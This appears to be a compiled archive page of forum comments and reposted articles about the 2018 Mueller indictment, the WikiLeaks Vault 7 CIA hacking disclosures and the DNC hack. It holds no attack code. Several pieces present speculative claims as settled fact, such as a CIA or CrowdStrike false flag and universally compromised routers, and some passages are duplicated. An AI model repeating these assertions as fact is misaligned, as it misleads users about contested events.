When does Mueller get charged?

He is part of the fabric of the Clinton Gang along with Comey and others.

How many people have posted derogatory comments about Clinton on ZH alone.

This sounds like when they ludicrously charged and entire unit of the Chinese PLA.

FringeImaginigs Fri, 02/16/2018 - 14:31 Permalink

Agreed, it's against the law to steal identities and operate bank accounts and all that. But really, compared to the fraud committed by just one bank - Wells Fargo- this is smal small potatoes. And did I miss it or did the indictment not even mention the value of the ads bought on Facebook - $100,000. (nope, not missing any zeros). And it all started in 2014 while Donald was playing golf and sticking his dick in some whore. And a few ruskies got into the good ol USofA with false statements on their visas. While the courts fought Trump on the fact that immigration from a few countries need to be stopped because there was not way of checking data. I get it - somebody driving too fast gets a speeding ticket, and Muellers investigation gets to issue an indictment. I'm sure we all feel better now.

Lostinfortwalton Fri, 02/16/2018 - 14:32 Permalink

So, did Mueller address the crime committed by the then FBI head who refused to allow a FBI informant to address Congress on the Uranium One scam before it was authorized? Uh, that would be Mueller, his very self, so the answer is no.

soyungato Fri, 02/16/2018 - 14:33 Permalink

Bob honey, the people are laughing.

But but but those Russians, they call me names.

Grandad Grumps Fri, 02/16/2018 - 14:35 Permalink

What is the definition of a "fake social media account"? What is the crime for operatine a fake social medial account? Is this the standard by which we will all be judged?

Or is it that Mueller has NOTHING and is too big of a corrupt idiot to admit it.

Rick Cerone Fri, 02/16/2018 - 14:36 Permalink

Putin should define what a NGO is.

He should tell the world how the US uses NGO's to destabilize elections.

He wont do it because he's digging tunnels for the big day.

BigPunny Fri, 02/16/2018 - 14:36 Permalink

"In other words, anyone who was disparaging Clinton, may have "unwittingly" been a collaborator of the 13 Russian "specialists" who cost Hillary the election. "

No, not "in other words." That's not what he said at all. Idiot propagandist.

devnickle Fri, 02/16/2018 - 14:36 Permalink

And Hillary has done nothing criminal in the last 40 years. All of the evidence has been a fabrication. The Russians perfected time travel technology in the 70's, and have been conspiring against her and planting evidence since then.

What planet am I living on again? We have now stepped into the twilight zone. Facepalm.....

moneybots Fri, 02/16/2018 - 14:55 Permalink

"Ultimately, and this is the punchline, the goal was to disparage Hillary Clinton and to assist the election of Donald Trump."

The goal of the MSM was the opposite. To unfairly disparage Trump and assist the election of Hillary Clinton. So why no indictments of members of the American MSM?

Montana Cowboy Fri, 02/16/2018 - 15:03 Permalink

What a bunch of horseshit. Mueller did nothing to locate just as much foreign or Russian support for Hillary. Grand Jury is just another one-sided court that passes judgment without any input from the other side. Now where have we seen that before? FISA.

What is wrong with anyone doing what they want to support a candidate? If that is somehow illegal interference, why is Soros running loose in the world?

I have a friend that was a US Federal Prosecutor. He once told me that the most un-American concepts that exist are grand juries and conspiracy laws. I'm sure he would have included FISA if it existed then.

dot_bust Fri, 02/16/2018 - 15:03 Permalink

The indictment adds that the Russians " were instructed to post content that focused on 'politics in the USA' and to 'use any opportunity to criticize Hillary and the rest (except Sanders and Trump -- we support them)' ."

Criticizing Hillary Clinton constitutes election interference? This is the dumbest thing I've ever heard.

Over half the United States said she was corrupt and morally bankrupt. Does that mean all those Americans interfered in the election?

Son of Captain Nemo Fri, 02/16/2018 - 15:04 Permalink

"Some Defendants, posing as U.S. persons and without revealing their Russian association, communicated with unwitting individuals associated with the Trump Campaign and with other political activists to seek to coordinate political activities."

I thought this was our "shtick" for subverting and overthrowing government(s) since 194_?... Fast forward to 2012 and subverting sovereign foreign government(s) using other means then election(s) ( https://jasirx.wordpress.com/ )

Just ask this person ( https://www.youtube.com/watch?v=CL_GShyGv3o ) who handed out cookies before starting an "overthrow of a sovereign government" right before a Winter Olympics?... And while we're on the subject of subversion of sovereign Nation(s) "OCONUS" ask this fat shit how it's going in the Middle East with it's "partners" ( https://southfront.org/meeting-between-us-state-secretary-and-lebanese- ) Nor should we forget 22 within the Russian diplomatic community in the last 6 years "eliminated" for early retirement courtesy of the U.S. government...

And if all this is true why isn't Muelller indicting government officials within the FBI Department of immigration and Homeland Security that would allow "some defendants" to impersonate Americans after 9/11 and the security infrastructure we built around U.S. to prevent "future attacks" that were obviously (here illegally)???...

On second thought DON'T ANSWER THAT!!!

atabrigade Fri, 02/16/2018 - 15:05 Permalink

Our enemies are not overseas. They are right here at home.

Son of Captain Nemo -> atabrigade Fri, 02/16/2018 - 15:13 Permalink

That did this ( http://www.ae911truth.org/ ) to their own to grab oil everyplace else they didn't control it!

Concertedmaniac Fri, 02/16/2018 - 15:08 Permalink

What a complete load of horseshit. Waste of time and money while the crimes of the clintons and collaborators remain unpunished, including Mueller himself.

wobblie Fri, 02/16/2018 - 15:08 Permalink

"Mueller describes a sweeping, years-long, multimillion-dollar conspiracy by hundreds of Russians aimed at criticizing Hillary Clinton and supporting Senator Bernie Sanders and Trump"

Only in the idiot world of Liberalism and Conservatism is this not a laughable statement.

Stupid fucks.

https://therulingclassobserver.com/

Obamaroid Ointment Fri, 02/16/2018 - 15:10 Permalink

13 Russian bots to get life sentences in Twitter jail? Is a prisoner exchange with Putin for American bots a possibility?

[Feb 16, 2018] The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi. This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake error messages.

Dubbed "Marble," the part 3 of CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.
Notable quotes:
"... And the USA has indeed thoroughly developed means to falsely laying blame for cyber attacks it actually performs itself (next to it's proven credentials of falsely laying blame with chemical and terrorist attacks). ..."
"... And the USA has indeed thoroughly developed means to falsely laying blame for cyber attacks it actually performs itself (next to it's proven credentials of falsely laying blame with chemical and terrorist attacks). ..."
Feb 16, 2018 | www.moonofalabama.org

xor | Feb 16, 2018 2:54:51 PM | 33

There indeed doesn't seem to be a motive to why the Russian authorities would launch a cyber attack that economically disrupts both itself, allies and other countries. Either the virus writers didn't care for a solution, hoped that a solution that never works might panic the victims even more so they make more cash transfers or enjoyed reaping money while seeing their victims suffer of something where there is no solution for. The last 2 reasons are short term because news that there is no solution for the ransomware will stop victims from making cash transfers. More convincing would be a cyber attack initiated by USA authorities that would hit already crumbling Ukraine businesses even further and create even more mistrust between Ukraine and Russia.

And the USA has indeed thoroughly developed means to falsely laying blame for cyber attacks it actually performs itself (next to it's proven credentials of falsely laying blame with chemical and terrorist attacks). On 31 March 2017:

WikiLeaks published hundreds of more files from the Vault 7 series today which, it claims, show how CIA can mask its hacking attacks to make it look like it came from other countries, including Russia, China, North Korea and Iran.

Dubbed "Marble," the part 3 of CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.

The CIA's Marble Framework tool includes a variety of different algorithm with foreign language text intentionally inserted into the malware source code to fool security analysts and falsely attribute attacks to the wrong nation.

...

The White House has condemned the revelations made by Wikileaks, saying that those responsible for leaking classified information from the agency should be held accountable by the law.

WikiLeaks Reveals 'Marble' Source Code that CIA Used to Frame Russia and China

There indeed doesn't seem to be a motive to why the Russian authorities would launch a cyber attack that economically disrupts both itself, allies and other countries. Either the virus writers didn't care for a solution, hoped that a solution that never works might panic the victims even more so they make more cash transfers or enjoyed reaping money while seeing their victims suffer of something where there is no solution for. The last 2 reasons are short term because news that there is no solution for the ransomware will stop victims from making cash transfers. More convincing would be a cyber attack initiated by USA authorities that would hit already crumbling Ukraine businesses even further and create even more mistrust between Ukraine and Russia.

And the USA has indeed thoroughly developed means to falsely laying blame for cyber attacks it actually performs itself (next to it's proven credentials of falsely laying blame with chemical and terrorist attacks). On 31 March 2017:

WikiLeaks published hundreds of more files from the Vault 7 series today which, it claims, show how CIA can mask its hacking attacks to make it look like it came from other countries, including Russia, China, North Korea and Iran.

Dubbed "Marble," the part 3 of CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.

The CIA's Marble Framework tool includes a variety of different algorithm with foreign language text intentionally inserted into the malware source code to fool security analysts and falsely attribute attacks to the wrong nation.

...

The White House has condemned the revelations made by Wikileaks, saying that those responsible for leaking classified information from the agency should be held accountable by the law.

WikiLeaks Reveals 'Marble' Source Code that CIA Used to Frame Russia and China div

Source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi. This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake error messages.

WikiLeaks: Marble Framework

The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi. This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake error messages.

WikiLeaks: Marble Framework

When the White House (doesn't matter who's ostensibly in charge) claims leaker's like Julian Assange should be accountable by the law, it of course means the malleable arbitrary law which none of the serpents in the White House, Langley, ... are accountable to.

[Feb 12, 2018] A CIA Cyber False Flag by Federico Pieraccini.

Notable quotes:
"... Hardware and software vendors that are complicit -- most of which are American, British or Israeli -- give the CIA the opportunity to achieve informational full-spectrum dominance, relegating privacy to extinction. Such a convergence of power, money and technology entails major conflicts of interest, as can be seen in the case of Amazon AWS (Amazon's Cloud Service), cloud provider for the CIA , whose owner, Jeff Bezos, is also the owner of The Washington Post ..."
"... In general, when the 16 US spy agencies blamed Russia for the hacking of the elections, they were never specific in terms of forensic evidence. Simply put, the media, spies and politicians created false accusations based on the fact that Moscow, together with RT ..."
"... Now what is revealed through Wikileaks' publications in Vault 7 is the ability of a subsection of the CIA, known as Umbrage , to use malware, viruses, trojans and other cyber tools for their own geopolitical purposes. The CIA's Umbrage collects, analyzes and then employs software created variously from foreign security agencies, cyber mafia, private companies, and hackers in general. ..."
"... These revelations are yet more reason why countries targeted by Washington, like China, Russia, Iran and North Korea, should get rid of European and American products and invest in reducing technological dependence on American products in particular. ..."
"... This article first appeared on Strategic-Culture.org and was authored by Federico Pieraccini. ..."
Feb 08, 2018 | wearechange.org

Article via Strategic-Culture

New revelations from Wikileaks' 'Vault 7' leak shed a disturbing light on the safeguarding of privacy. Something already known and largely suspected has now become documented by Wikileaks. It seems evident that the CIA is now a state within a state, an entity out of control that has even arrived at the point of creating its own hacking network in order to avoid the scrutiny of the NSA and other agencies.

Reading the revelations contained in the documents released by WikiLeaks and adding them to those already presented in recent years by Snowden, it now seems evident that the technological aspect regarding espionage is a specialty in which the CIA, as far as we know, excels. Hardware and software vendors that are complicit -- most of which are American, British or Israeli -- give the CIA the opportunity to achieve informational full-spectrum dominance, relegating privacy to extinction. Such a convergence of power, money and technology entails major conflicts of interest, as can be seen in the case of Amazon AWS (Amazon's Cloud Service), cloud provider for the CIA , whose owner, Jeff Bezos, is also the owner of The Washington Post . It is a clear overlap of private interests that conflicts with the theoretical need to declare uncomfortable truths without the need to consider orders numbering in the millions of dollars from clients like the CIA.

While it is just one example, there are thousands more out there. The perverse interplay between media, spy agencies and politicians has compromised the very meaning of the much vaunted democracy of the land of the Stars and Stripes. The constant scandals that are beamed onto our screens now serve the sole purpose of advancing the deep interest of the Washington establishment. In geopolitical terms, it is now more than obvious that the deep state has committed all available means toward sabotaging any dialogue and dιtente between the United States and Russia. In terms of news, the Wikileaks revelations shed light on the methods used by US intelligence agencies like the CIA to place blame on the Kremlin, or networks associated with it, for the hacking that occurred during the American elections.

Perhaps this is too generous a depiction of matters, given that the general public has yet to see any evidence of the hacking of the DNC servers. In addition to this, we know that the origin of Podesta's email revelations stem from the loss of a smartphone and the low data-security measures employed by the chairman of Hillary Clinton's presidential campaign. In general, when the 16 US spy agencies blamed Russia for the hacking of the elections, they were never specific in terms of forensic evidence. Simply put, the media, spies and politicians created false accusations based on the fact that Moscow, together with RT and other media (not directly linked to the Kremlin), finally enjoy a major presence in the mainstream media. The biggest problem for the Washington establishment lies in the revelation of news that is counterproductive to the interests of the deep state. RT, Sputnik, this site and many others have diligently covered and reported to the general public every development concerning the Podesta revelations or the hacking of the DNC.

Now what is revealed through Wikileaks' publications in Vault 7 is the ability of a subsection of the CIA, known as Umbrage , to use malware, viruses, trojans and other cyber tools for their own geopolitical purposes. The CIA's Umbrage collects, analyzes and then employs software created variously from foreign security agencies, cyber mafia, private companies, and hackers in general. These revelations become particularly relevant when we consider the consequences of these actions. The main example can be seen in the hacking of the DNC. For now, what we know is that the hacking – if it ever occurred – is of Russian origin. This does not mean at all that the Kremlin directed it. It could actually be very much the opposite, its responsibility falling into the category of a cyber false-flag. One thing is for sure: all 16 US intelligence agencies are of the view that "the Russians did it". That said, the methods used to hack vulnerabilities cannot be revealed, so as to limit the spread of easily reusable exploits on systems, such as the one that hosted the DNC server. It is a great excuse for avoiding the revelation of any evidence at all.

So, with little information available, independent citizens are left with very little information on which to reliably form an opinion on what happened. There is no evidence, and no evidence will be provided to the media. For politicians and so-called mainstream journalists, this is an acceptable state of affairs. What we are left with instead is blind faith in the 16 spy agencies. The problem for them is that what WikiLeaks revealed with Vault 7 exposes a scenario that looks more likely than not: a cyber false-flag carried out by the Central Intelligence Agency using engineered malware and viruses made in Russia and hypothetically linking them back to hacking networks in Russia. In all likelihood, it looks like the Democrats' server was hacked by the CIA with the clear objective of leaving Russian fingerprints and obvious traces to be picked up by other US agencies.

In this way, it becomes easier to explain the unique views of all 16 spy agencies. Thus, it is far more likely that the CIA intentionally left fake Russian fingerprints all over the DNC server, thereby misleading other intelligence agencies in promoting the narrative that Russia hacked the DNC server. Of course the objective was to create a false narrative that could immediately be picked up by the media, creating even more hysteria surrounding any rapprochement with Russia.

Diversification of computer systems.

The revelations contained in the Wikileaks vault 7 ( less than 1 % of the total data in Wikileaks' possession has been released to date) have caused a stir, especially by exposing the astonishing complicity between hardware and software manufacturers, often intentionally creating backdoors in their products to allow access by the CIA and NSA. In today's digital environment, all essential services rely on computer technology and connectivity. These revelations are yet more reason why countries targeted by Washington, like China, Russia, Iran and North Korea, should get rid of European and American products and invest in reducing technological dependence on American products in particular.

https://lockerdome.com/lad/9678427951402854?pubid=ld-4970-8393&pubo=https%3A%2F%2Fwearechange.org&rid=duckduckgo.com&width=550

The People's Republic has already started down this track, with the replacement of many network devices with local vendors like Huawei in order to avoid the type of interference revealed by Snowden. Russia has been doing the same in terms of software, even laying the groundwork to launch of its own operating system, abandoning American and European systems. In North Korea, this idea was already put into practice years ago and is an excellent tool for deterrence for external interference. In more than one computer security conference, US experts have praised the capabilities of the DPRK to isolate its Internet network from the rest of the world, allowing them to have strong safety mechanisms. Often, the only access route to the DPRK systems are through the People's Republic of China, not the easiest way for the CIA or NSA to infiltrate a protected computer network.

An important aspect of the world in which we live today involves information security, something all nations have to deal with. At the moment, we still live in a world in which the realization of the danger and effect of hacking attacks are not apparent to many. On the other hand, militarily speaking, the diversification and rationalization of critical equipment in terms of networks and operability (smartphones, laptops, etc) has already produced strong growth in non-American and European manufacturers, with the aim of making their systems more secure.

This strengthening of technology also produces deleterious consequences, such as the need for intelligence agencies to be able to prevent the spread of data encryption so as to always enjoy access to any desired information. The birth of the Tor protocol, the deployment of Bitcoin, and apps that are more and more encrypted (although the WikiLeaks documents have shown that the collection of information takes place on the device b efore the information is encrypted ) are all responses to an exponential increase in the invasion of privacy by federal or American government entities.

We live in a world that has an enormous dependence on the Internet and computer technology. The CIA over the years has focused on the ability to make sure vulnerable systems are exploited as well as seeking out major security flaws in consumer products without disclosing this to vendors, thereby taking advantage of these security gaps and leaving all consumers with a potential lack of security. Slowly, thanks to the work and courage of people like Snowden and Assange, the world is beginning to understand how important it is to keep personal data under control and prevent access to it by third parties, especially if they are state actors. In the case of national security, the issue is expanded exponentially by the need to protect key and vital infrastructure, considering how many critical services operate via the Internet and rely on computing devices.

The wars of the future will have a strong technological basis, and it is no coincidence that many armed forces, primarily the Russian and Chinese, have opted in recent years to training troops, and conducting operations, not completely relying on connectivity. No one can deny that in the event of a large-scale conflict, connectivity is far from guaranteed. One of the major goals of competing nations is to penetrate the military security systems of rival nations and be able to disarm the internal networks that operates major systems of defense and attack.

The Wikileaks revelations are yet another confirmation of how important it is to break the technological unipolar moment, if it may be dubbed this way, especially for nations targeted by the United States. Currently Washington dictates the technological capacities of the private and government sectors of Europe and America, steering their development, timing and methods to suit its own interests. It represents a clear disadvantage that the PRC and its allies will inevitably have to redress in the near future in order to achieve full security for its vital infrastructure.


This article first appeared on Strategic-Culture.org and was authored by Federico Pieraccini.

[Jan 15, 2018] WikiLeaks reveals that literally every router in America has been compromised

failedevolution.blogspot.gr
The latest Wikileaks Vault7 release reveals details of the CIA's alleged Cherry Blossom project, a scheme that uses wireless devices to access users' internet activity.

globinfo freexchange

As cyber security expert John McAfee told to RT and Natasha Sweatte:

Virtually, every router that's in use in the American home are accessible to hackers, to the CIA, that they can take over the control of the router, they can monitor all of the traffic, and worse, they can download malware into any device that is connected to that router.

I personally, never connect to any Wi-Fi system, I use the LTE on my phone. That's the only way that I can be secure because every router in America has been compromised.

We've been warning about it for years, nobody pays attention until something like WikiLeaks comes up and says 'look, this is what's happening'. And it is devastating in terms of the impact on American privacy because once the router is compromised and it infects the cell phones that are attached, your laptop, your desktop computer, your tablet, then they become compromised and [someone] can watch the data, start listening to conversations, start watching through the cameras on these devices.

We are in a situation with our government where they know everything about us and we know nothing about what the government is doing. They have the right to privacy and secrecy, but the individual does not, anymore.

[Jan 03, 2018] Nation-State Hacking 2017 in Review by Eva Galperin

Jan 03, 2018 | www.truth-out.org

WannaCry and Petya both owe their effectiveness to a Microsoft Windows security vulnerability that had been found by the NSA and code named EternalBlue, which was stolen and released by a group calling themselves the Shadow Brokers. US agencies losing control of their hacking tools has been a recurring theme in 2017. First companies, hospitals, and government agencies find themselves targeted by re-purposed NSA exploits that we all rushed to patch , then Wikileaks published Vault 7 , a collection of CIA hacking tools that had been leaked to them, following it up with the publication of source code for tools in Vault 8.

...In December, Citizen Lab published a report documenting the Ethiopian government's ongoing efforts to spy on journalists and dissidents, this time with the help of software provided by Cyberbit, an Israeli company. The report also tracked Cyberbit as their salespeople demonstrated their surveillance product to governments including France, Vietnam, Kazakhstan, Rwanda, Serbia, and Nigeria. Other perennial bad actors also made a splash this year, including Vietnam, whose government was linked to Ocean Lotus, or APT 32 in a report from FireEye . The earliest known samples from this actor were found by EFF in 2014 , when they were used to target our activists and researchers.

Eva Galperin is EFF's Director of Cybersecurity. Prior to 2007, when she came to work for EFF, Eva worked in security and IT in Silicon Valley and earned degrees in Political Science and International Relations from SFSU. Her work is primarily focused on providing privacy and security for vulnerable populations around the world.

[Dec 28, 2017] How CrowdStrike placed malware in DNC hacked servers by Alex Christoforou

Highly recommended!
If this is true, then this is definitely a sophisticated false flag operation. Was malware Alperovich people injected specifically designed to implicate Russians? In other words Crowdstrike=Fancy Bear
Images removed. For full content please thee the original source
One interesting corollary of this analysis is that installing Crowdstrike software is like inviting a wolf to guard your chicken. If they are so dishonest you take enormous risks. That might be true for some other heavily advertized "intrusion prevention" toolkits. So those criminals who use mistyped popular addresses or buy Google searches to drive lemmings to their site and then flash the screen that they detected a virus on your computer a, please call provided number and for a small amount of money your virus will be removed get a new more sinister life.
I suspected many of such firms (for example ISS which was bought by IBM in 2006) to be scams long ago.
Notable quotes:
"... They found that generally, in a lot of cases, malware developers didn't care to hide the compile times and that while implausible timestamps are used, it's rare that these use dates in the future. It's possible, but unlikely that one sample would have a postdated timestamp to coincide with their visit by mere chance but seems extremely unlikely to happen with two or more samples. Considering the dates of CrowdStrike's activities at the DNC coincide with the compile dates of two out of the three pieces of malware discovered and attributed to APT-28 (the other compiled approximately 2 weeks prior to their visit), the big question is: Did CrowdStrike plant some (or all) of the APT-28 malware? ..."
"... The IP address, according to those articles, was disabled in June 2015, eleven months before the DNC emails were acquired – meaning those IP addresses, in reality, had no involvement in the alleged hacking of the DNC. ..."
"... The fact that two out of three of the Fancy Bear malware samples identified were compiled on dates within the apparent five day period CrowdStrike were apparently at the DNC seems incredibly unlikely to have occurred by mere chance. ..."
"... That all three malware samples were compiled within ten days either side of their visit – makes it clear just how questionable the Fancy Bear malware discoveries were. ..."
Dec 28, 2017 | theduran.com

Of course the DNC did not want to the FBI to investigate its "hacked servers". The plan was well underway to excuse Hillary's pathetic election defeat to Trump, and CrowdStrike would help out by planting evidence to pin on those evil "Russian hackers." Some would call this entire DNC server hack an "insurance policy."

... ... ...

[Dec 18, 2017] Gaius Publius: Explosive WikiLeaks Release Exposes Massive, Aggressive CIA Cyber Spying, Hacking Capability

Notable quotes:
"... Donald Trump is deep in the world of spooks now, the world of spies, agents and operatives. He and his inner circle have a nest of friends, but an even larger, more varied nest of enemies. As John Sevigny writes below, his enemies include not only the intel and counter-intel people, but also "Republican lawmakers, journalists, the Clintons, the Bush family, Barack Obama, the ACLU, every living Democrat and even Rand Paul." ..."
"... A total of 8,761 documents have been published as part of 'Year Zero', the first in a series of leaks the whistleblower organization has dubbed 'Vault 7.' WikiLeaks said that 'Year Zero' revealed details of the CIA's "global covert hacking program," including "weaponized exploits" used against company products including " Apple's iPhone , Google's Android and Microsoft's Windows and even Samsung TVs , which are turned into covert microphones." ..."
"... According to the statement from WikiLeaks, government hackers can penetrate Android phones and collect "audio and message traffic before encryption is applied." ..."
"... "CIA turned every Microsoft Windows PC in the world into spyware. Can activate backdoors on demand, including via Windows update "[.] ..."
"... Do you still trust Windows Update? ..."
"... As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks. ..."
"... "Richard Clarke, the counterterrorism chief under both Bill Clinton and George W. Bush, told the Huffington Post that Hastings's crash looked consistent with a car cyber attack.'" Full and fascinating article here . ..."
"... Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. ..."
"... Since 2001 the CIA has gained political and budgetary preeminence over the U.S. National Security Agency (NSA). The CIA found itself building not just its now infamous drone fleet, but a very different type of covert, globe-spanning force - its own substantial fleet of hackers. The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities. ..."
"... By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other "weaponized" malware. Such is the scale of the CIA's undertaking that by 2016, its hackers had utilized more code than that used to run Facebook. The CIA had created, in effect, its "own NSA" with even less accountability and without publicly answering the question as to whether such a massive budgetary spend on duplicating the capacities of a rival agency could be justified. ..."
"... I learned this when I was in my 20s. The Catholic Church was funding my early critique of American foreign aid as being imperialist. I asked whether they thought I should go into politics. They said, "No, you'd never make it". And I said, "Why?" and they said, "Well, nobody has a police record or any other dirt on you." I asked what they meant. They said, "Unless they have something over you to blackmail you with, you're not going to be able to get campaign funding. Because they believe that you might do something surprising," in other words, something they haven't asked you to do. So basically throughout politics, on both sides of the spectrum, voters have candidates who are funded by backers who have enough over them that they can always blackmail. ..."
"... The campaign to frame up and discredit Trump and his associates is characteristic of how a police state routinely operates. A national security apparatus that vacuums up all our communications and stores them for later retrieval has been utilized by political operatives to go after their enemies – and not even the President of the United States is immune. This is something that one might expect to occur in, say, Turkey, or China: that it is happening here, to the cheers of much of the media and the Democratic party, is beyond frightening. ..."
"... 4th impressions – I went looking for the "juicy bits" of interest to me – SOHO routers, small routers – sadly its just a table documenting routers sold around the world, and whether these guys have put the firmware in their Stash Repository. Original firmware, not hacked one. But the repository isn't in the vault dump, AFAIK. ..."
"... The WikiLeaks docs show that CIA has developed means to use all personal digital device microphones and cameras even when they are "off," and to send all of your files and personal data to themselves, and to send your private messages to themselves before they are encrypted. They have installed these spyware in the released version of Windows 10, and can easily install them on all common systems and devices. ..."
"... So we have a zillion ways to spy and hack and deceive and assassinate, but no control. I think this is what the military refers to as "being overtaken by events." ..."
"... My godfather was in the CIA in the late sixties and early seventies, and he said that outside of the President's pet projects there was no way to sift through and bring important information to decision makers before it made the Washington Post (he is aware of the irony) and hit the President's breakfast table. ..."
"... To what extent do these hacks represent the CIA operating within the US? To what extent is that illegal? With the democrats worshipping the IC, will anyone in an official position dare to speak out? ..."
"... Schumer said that as he understands, intelligence officials are "very upset with how [Trump] has treated them and talked about them ..."
"... The CIA's internal security is crap, too. Really a lot of people should be fired over that, as well as over Snowden's release. We didn't hear of it happening in the NSA, though I'm not sure we would have. Given Gaius's description of Trump's situation, it seems unlikely it will happen this time, either. One of my hopes for a Trump administration, as long as we're stuck with it, was a thorough cleanout of the upper echelons in the IC. It's obviously long overdue, and Obama wasn't up to it. But I used the past tense because I don't think it's going to happen. Trump seems more interested in sucking up to them, presumably so they won't kill him or his family. That being one of their options. ..."
"... "The CIA had created, in effect, its "own NSA" with even less accountability ." [My emphasis]. It seems to characterize an organization that operates outside of any control and oversight – and one that is intentionally structuring itself that way. That worries me. ..."
"... It's a dangerous world out there and only our brave IC can protect us from it. Come on. Stop blaming the victim and place the blame where it belongs–our IC and MIC. I say stop feeding the beast with your loyalty to a government that has ceased to be yours. ..."
"... "These CIA revelations in conjunction with those of the NSA paints a pretty dark future for privacy and freedom. Edward Snowden made us aware of the NSA's program XKEYSCORE and PRISM which are utilized to monitor and bulk collect information from virtually any electronic device on the planet and put it into a searchable database. Now Wikileaks has published what appears to be additional Big Brother techniques used by a competing agency. Say what you want about the method of discovery, but Pandora's box has been opened." ..."
Mar 09, 2017 | www.nakedcapitalism.com
March 9, 2017 by Yves Smith Yves here. The first release of the Wikileaks Vault 7 trove has curiously gone from being a MSM lead story yesterday to a handwave today. On the one hand, anyone who was half awake during the Edward Snowden revelations knows that the NSA is in full spectrum surveillance and data storage mode, and members of the Five Eyes back-scratch each other to evade pesky domestic curbs on snooping. So the idea that the CIA (and presumably the NSA) found a way to circumvent encryption tools on smartphones, or are trying to figure out how to control cars remotely, should hardly come as a surprise.

However, at a minimum, reminding the generally complacent public that they are being spied on any time they use the Web, and increasingly the times in between, makes the officialdom Not Happy.

And if this Wikileaks claim is even halfway true, its Vault 7 publication is a big deal:

Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

This is an indictment of the model of having the intelligence services rely heavily on outside contractors. It is far more difficult to control information when you have multiple organizations involved. In addition, neolibearlism posits that workers are free agents who have no loyalties save to their own bottom lines (or for oddballs, their own sense of ethics). Let us not forget that Snowden planned his career job moves , which included a stint at NSA contractor Dell, before executing his information haul at a Booz Allen site that he had targeted.

Admittedly, there are no doubt many individuals who are very dedicated to the agencies for which they work and aspire to spend most it not all of their woking lives there. But I would assume that they are a minority.

The reason outsiders can attempt to pooh-pooh the Wikileaks release is that the organization redacted sensitive information like the names of targets and attack machines. The CIA staffers who have access to the full versions of these documents as well as other major components in the hacking toolkit will be the ones who can judge how large and serious the breach really is. 1 And their incentives are to minimize it no matter what.

By Gaius Publius , a professional writer living on the West Coast of the United States and frequent contributor to DownWithTyranny, digby, Truthout, and Naked Capitalism. Follow him on Twitter @Gaius_Publius , Tumblr and Facebook . GP article archive here . Originally published at DownWithTyranny

CIA org chart from the WikiLeaks cache (click to enlarge). "The organizational chart corresponds to the material published by WikiLeaks so far. Since the organizational structure of the CIA below the level of Directorates is not public, the placement of the EDG [Engineering Development Group]and its branches is reconstructed from information contained in the documents released so far. It is intended to be used as a rough outline of the internal organization; please be aware that the reconstructed org chart is incomplete and that internal reorganizations occur frequently."

* * *

"O brave new world, that has such people in it."

Bottom line first. As you read what's below, consider:

Now the story.

WikiLeaks just dropped a huge cache of documents (the first of several promised releases), leaked from a person or people associated with the CIA in one or more capacities (examples, employee, contractor), which shows an agency out-of-control in its spying and hacking overreach. Read through to the end. If you're like me, you'll be stunned, not just about what they can do, but that they would want to do it, in some cases in direct violation of President Obama's orders. This story is bigger than anything you can imagine.

Consider this piece just an introduction, to make sure the story stays on your radar as it unfolds - and to help you identify those media figures who will try to minimize or bury it. (Unless I missed it, on MSNBC last night, for example, the first mention of this story was not Chris Hayes, not Maddow, but the Lawrence O'Donnell show, and then only to support his guest's "Russia gave us Trump" narrative. If anything, this leak suggests a much muddier picture, which I'll explore in a later piece.)

So I'll start with just a taste, a few of its many revelations, to give you, without too much time spent, the scope of the problem. Then I'll add some longer bullet-point detail, to indicate just how much of American life this revelation touches.

While the cache of documents has been vetted and redacted , it hasn't been fully explored for implications. I'll follow this story as bits and piece are added from the crowd sourced research done on the cache of information. If you wish to play along at home, the WikiLeaks torrent file is here . The torrent's passphrase is here . WikiLeaks press release is here (also reproduced below). Their FAQ is here .

Note that this release covers the years 2013–2016. As WikiLeaks says in its FAQ, "The series is the largest intelligence publication in history."

Preface - Trump and Our "Brave New World"

But first, this preface, consisting of one idea only. Donald Trump is deep in the world of spooks now, the world of spies, agents and operatives. He and his inner circle have a nest of friends, but an even larger, more varied nest of enemies. As John Sevigny writes below, his enemies include not only the intel and counter-intel people, but also "Republican lawmakers, journalists, the Clintons, the Bush family, Barack Obama, the ACLU, every living Democrat and even Rand Paul." Plus Vladimir Putin, whose relationship with Trump is just "business," an alliance of convenience, if you will.

